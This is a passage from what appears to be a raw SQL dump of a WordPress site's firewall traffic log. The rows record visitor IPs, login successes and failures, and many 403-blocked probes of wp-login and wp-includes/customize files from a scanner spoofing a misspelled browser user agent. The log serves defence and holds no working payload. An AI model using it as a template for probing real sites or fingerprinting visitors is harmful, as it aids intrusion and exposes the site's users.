User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134719,1700192224.172491,1700192224.163400,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/languages/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbGFuZ3VhZ2VzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134743,0.000000,1700223802.728323,0x00000000000000000000FFFFB23E562C,0,200,0,0,0,'https://ECKANKAR-COLORADO.ORG/wp-login.php','HTTPS://ECKANKAR-COLORADO.ORG/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134744,0.000000,1700231531.771080,0x00000000000000000000FFFFB860D197,0,302,0,15,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36','loginOK',NULL,NULL),(134745,1700234515.186127,1700234515.178200,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134720,0.000000,1700192231.586867,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134721,1700192244.446857,1700192244.431600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134739,0.000000,1700223621.272698,0x00000000000000000000FFFF29C1053C,0,200,0,0,0,'https://ECKANKAR-COLORADO.ORG/wp-login.php','HTTPS://ECKANKAR-COLORADO.ORG/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(134742,0.000000,1700223747.442761,0x00000000000000000000FFFFD9B6AD0F,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0','loginFailInvalidUsername',NULL,NULL),(133486,1699888583.646224,1699888583.637400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-media-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-media-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbWVkaWEtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133485,1699888583.988214,1699888583.979500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtYXV0by1hZGQtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133484,1699888584.326206,1699888584.317500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133483,1699888584.678535,1699888584.669900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtaXRlbS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133482,1699888585.015234,1699888585.006500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtaXRlbS1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133481,1699888585.405827,1699888585.397100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-location-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbG9jYXRpb24tY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133480,1699888585.744416,1699888585.735700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbG9jYXRpb25zLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133479,1699888586.229619,1699888586.220800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-name-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtbmFtZS1jb250cm9sLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133478,1699888586.622132,1699888586.613400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-section.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-section.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtc2VjdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133477,1699888586.966476,1699888586.951200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menu-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnUtc2V0dGluZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133476,1699888587.307637,1699888587.298900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menus-panel.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-nav-menus-panel.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmF2LW1lbnVzLXBhbmVsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133475,1699888587.645041,1699888587.636100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmV3LW1lbnUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133474,1699888587.990178,1699888587.981400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-section.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-new-menu-section.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbmV3LW1lbnUtc2VjdGlvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133473,1699888588.327760,1699888588.319000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-partial.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-partial.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtcGFydGlhbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133472,1699888588.676242,1699888588.667200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-selective-refresh.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-selective-refresh.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2VsZWN0aXZlLXJlZnJlc2gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133471,1699888589.047884,1699888589.016600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-sidebar-section.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-sidebar-section.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2lkZWJhci1zZWN0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133470,1699888589.410615,1699888589.401900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-site-icon-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-site-icon-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtc2l0ZS1pY29uLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133469,1699888589.763509,1699888589.754800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-theme-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-theme-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWUtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133468,1699888590.107794,1699888590.099100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-themes-panel.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-themes-panel.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtdGhlbWVzLXBhbmVsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133467,1699888590.463023,1699888590.441100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-themes-section.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-